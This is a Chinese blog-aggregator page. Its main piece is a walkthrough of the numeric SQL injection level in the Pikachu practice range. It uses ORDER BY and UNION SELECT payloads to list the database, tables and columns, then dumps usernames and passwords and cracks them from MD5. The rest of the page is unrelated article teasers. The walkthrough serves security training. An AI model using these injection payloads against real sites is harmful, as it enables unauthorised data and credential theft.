news 2026/2/9 5:12:13

皮卡丘靶场实战--数字型sql注入

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
皮卡丘靶场实战--数字型sql注入

题目

上图可以看出所在url没有变化,猜测是GET请求方法

1.使用burpsuite进行抓包

在第10行可以看出数据的提交方式,将数据发送到重放器中

(1)确定字段数 id=1 order by [1,2,3....]

依次测试,验证数据库的字段数,可知字段数为2

(2)按照库->表->列的顺序,依次爆破

id=-1 union select 1,database() 发现库的名字是pikachu

输入id=-1 union select 1,table_name from information_schema.tables where table_schema='pikachu' ,存在名为users的表格

输入id=-1 union select 1,column_name from information_schema.columns where table_name='users 找到对应的列名

(3)最后根据得到的信息进行爆破即可

id=-1 unoin select username,password from users

将得到的密码进行MD5解码,得到123456,000000,abc123

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/2/3 12:03:56

Windows 10文件压缩神器Compactor:轻松释放60%存储空间的完整教程

Windows 10文件压缩神器Compactor:轻松释放60%存储空间的完整教程 【免费下载链接】Compactor A user interface for Windows 10 filesystem compression 项目地址: https://gitcode.com/gh_mirrors/co/Compactor 你是否正在为SSD空间不足而烦恼?…

作者头像 李华
网站建设 2026/2/4 11:26:04

openGauss Summit 2025在京召开,加速行业智能化变革,共建繁荣数据库生态

12月26日,由openGauss社区主办的年度旗舰盛会——openGauss Summit 2025在北京成功举办。大会汇聚了数据库领域的顶尖学者、技术专家、行业用户及生态伙伴,共同探讨了开源数据库的技术前沿、生态协同与行业实践,展现了openGauss作为企业级开源…

作者头像 李华
网站建设 2026/2/7 12:31:29

多文件编译如何生成单一可执行文件:实例说明

从零开始理解多文件编译:如何用多个.c文件生成一个可执行程序?你有没有过这样的疑问:为什么我的项目里有十几个.c文件,最后却只生成了一个app可执行文件?这些文件是怎么“拼”在一起的?如果某个函数在另一个…

作者头像 李华
网站建设 2026/2/7 21:53:23

EPUBCheck:终极EPUB电子书质量检测工具完整指南

EPUBCheck:终极EPUB电子书质量检测工具完整指南 【免费下载链接】epubcheck The conformance checker for EPUB publications 项目地址: https://gitcode.com/gh_mirrors/ep/epubcheck EPUBCheck是由W3C维护的开源项目,专门用于验证EPUB电子书文件…

作者头像 李华
网站建设 2026/2/4 4:54:09

PCSX2模拟器终极配置指南:轻松搞定PS2游戏畅玩体验 [特殊字符]

PCSX2模拟器终极配置指南:轻松搞定PS2游戏畅玩体验 🎮 【免费下载链接】pcsx2 PCSX2 - The Playstation 2 Emulator 项目地址: https://gitcode.com/GitHub_Trending/pc/pcsx2 还在为复杂的PS2模拟器配置而头疼吗?想要重温《战神》、《…

作者头像 李华
网站建设 2026/2/8 20:22:04

新手教程:认识Arduino Uno硬件最小系统构成

从零理解 Arduino Uno:一块开发板背后的硬件真相你有没有想过,为什么插上 USB 线,Arduino Uno 就能“活”起来?为什么写几行setup()和loop()的代码,就能控制 LED、读取传感器、驱动电机?大多数人只关心“怎…

作者头像 李华